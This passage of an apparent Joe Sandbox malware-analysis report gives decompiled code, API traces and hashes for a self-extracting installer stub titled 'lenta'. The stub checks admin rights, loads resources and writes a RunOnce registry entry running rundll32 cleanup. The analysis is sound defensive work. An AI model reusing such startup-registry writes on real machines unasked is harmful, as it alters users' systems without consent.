                                                                        • RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F328A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F328AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F328B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F327E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 2e4bb52508a7667bd8c2968e707f2264b75d05523e20656d2da9f328e3568bb7
                                                                        • Instruction ID: e40ef4c7227820f7c2fb81ad21876c3e64fd28d95026f177a5724582d80f6846
                                                                        • Opcode Fuzzy Hash: 2e4bb52508a7667bd8c2968e707f2264b75d05523e20656d2da9f328e3568bb7
                                                                        • Instruction Fuzzy Hash: 2941D5B1E0012CAFDB649B659C85AFE7BBDEF15730F0040AAF585D2100CB708E85AFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00F32267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xf38004; // 0xc69e30f7
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xf38530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00F3658A( &_v268, 0x104, 0xf31140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F3171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00F36CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F322A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F322D8
                                                                        • memset.MSVCRT ref: 00F322F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F3236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F3237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F32321
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F32299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F3232D
                                                                        • wextract_cleanup1, xrefs: 00F3227C, 00F322CD, 00F32363
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                        • API String ID: 3027380567-490507210
                                                                        • Opcode ID: 9bbac232f15ddc2f89442bcff601c6d4e04159d1b90e79e2020213220a117195
                                                                        • Instruction ID: a44d84f8acdf4ab04ccb2a4fc9b86c9ccd24dac0ba275176615cc7e3a7eaaaec
                                                                        • Opcode Fuzzy Hash: 9bbac232f15ddc2f89442bcff601c6d4e04159d1b90e79e2020213220a117195
                                                                        • Instruction Fuzzy Hash: AD31E5B1A0021CABDB659B11DC89FEA7B7CEF14770F0400A9B54DE6040EA75AB89EA50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00F33100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xf38590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xf38590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00F343D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xf38d4c);
                                                                        					SetWindowTextA(_t33, "lenta");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xf388b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00F330C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00F3313B
                                                                        • GetDesktopWindow.USER32 ref: 00F3314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00F3316A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F33176
                                                                        • SetForegroundWindow.USER32(?), ref: 00F3317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00F33185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00F33190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00F330C0), ref: 00F331A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F331CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: lenta
                                                                        • API String ID: 3785188418-2780258678
                                                                        • Opcode ID: f72abe626af25e4c7d3e6f291da248352b96fda771a70547ceee4db507d647ea
                                                                        • Instruction ID: b7b91e8ffdae5083932945b464e4c9bf794139322ba2f96a9b74ca78f71b3d0f
                                                                        • Opcode Fuzzy Hash: f72abe626af25e4c7d3e6f291da248352b96fda771a70547ceee4db507d647ea
                                                                        • Instruction Fuzzy Hash: 7D11D332A08259BBDB11FF259C0CBAA3A65FB4A731F100610F855D21E0DBB89641FB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00F318A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xf38128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00F36CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00F317EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xf38128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xf38128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00F317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F318DD), ref: 00F3181A
                                                                          • Part of subcall function 00F317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3182C
                                                                          • Part of subcall function 00F317EE: AllocateAndInitializeSid.ADVAPI32(00F318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F318DD), ref: 00F31855
                                                                          • Part of subcall function 00F317EE: FreeSid.ADVAPI32(?,?,?,?,00F318DD), ref: 00F31883
                                                                          • Part of subcall function 00F317EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F318DD), ref: 00F3188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F318EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F318F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F3190A
                                                                        • GetLastError.KERNEL32 ref: 00F31918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F3192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F31944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F31964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00F3197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00F3199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F319A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00F319AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 9908d0a7f11edbe80abdac3f918a37d52264bc096a742c6237a5b9b67ecd068f
                                                                        • Instruction ID: 8bf5e64a103a973cb86ecc711507b857e64b7b44a992de525e230a64d86cc20f
                                                                        • Opcode Fuzzy Hash: 9908d0a7f11edbe80abdac3f918a37d52264bc096a742c6237a5b9b67ecd068f
                                                                        • Instruction Fuzzy Hash: F1313C71E01209AFDB209FA6DC48AAFBBBDFF04370F100429E545D2150D7349915EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00F3468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                        • LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                        • memcpy_s.MSVCRT ref: 00F346E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$lenta
                                                                        • API String ID: 3370778649-2035842925
                                                                        • Opcode ID: 81adc76d5f33af3d9b74ddb020c7a040a66e3f225011bd18712fa506c481929d
                                                                        • Instruction ID: fbb18c6c133b8884760cf827b5c595ddb23893439dc87b799f457bc31569e903
                                                                        • Opcode Fuzzy Hash: 81adc76d5f33af3d9b74ddb020c7a040a66e3f225011bd18712fa506c481929d
                                                                        • Instruction Fuzzy Hash: 2D01A9766442187BE3102BA65C4DF6B7E2DDBC6F71F040014FA8997191C9B1A841A6B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00F317EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xf3a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E00F36CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F318DD), ref: 00F3181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00F318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F318DD), ref: 00F31855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00F318DD), ref: 00F31883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F318DD), ref: 00F3188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: f79d72ed6157932055aa76a9f6f74d48043478f9d61e199b4ff1e4daee68dd6b
                                                                        • Instruction ID: 28c8e90e44aeca7c69f856ebb5080f35af20080430ccb91608ebf72211417d14
                                                                        • Opcode Fuzzy Hash: f79d72ed6157932055aa76a9f6f74d48043478f9d61e199b4ff1e4daee68dd6b
                                                                        • Instruction Fuzzy Hash: 5C11B671E00209AFDB149FA5DC49ABEBB79FF44721F100169F941E3290DB308D01AB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00F343D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "lenta");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xf39404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xf391dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F33490
                                                                        • GetDesktopWindow.USER32 ref: 00F3349A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F334B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00F334C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00F334CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00F334D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: lenta
                                                                        • API String ID: 852535152-2780258678
                                                                        • Opcode ID: 28b19400a3160db1bae7c7307e39070d44561eb9469a0f1921361671eebdf787
                                                                        • Instruction ID: 205de05db856f561b37e3643a9dfe1756f805cb57f51f47aa3af6a2b1fb34019
                                                                        • Opcode Fuzzy Hash: 28b19400a3160db1bae7c7307e39070d44561eb9469a0f1921361671eebdf787
                                                                        • Instruction Fuzzy Hash: 0001F732640118ABC717EF66DC0C96E7B66EB05730F108010F987966B1CBB19F41FBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00F32AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xf38004; // 0xc69e30f7
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xf39a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00F31680(_t65, E00F317C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00F365E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00F31680(_t65, E00F317C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
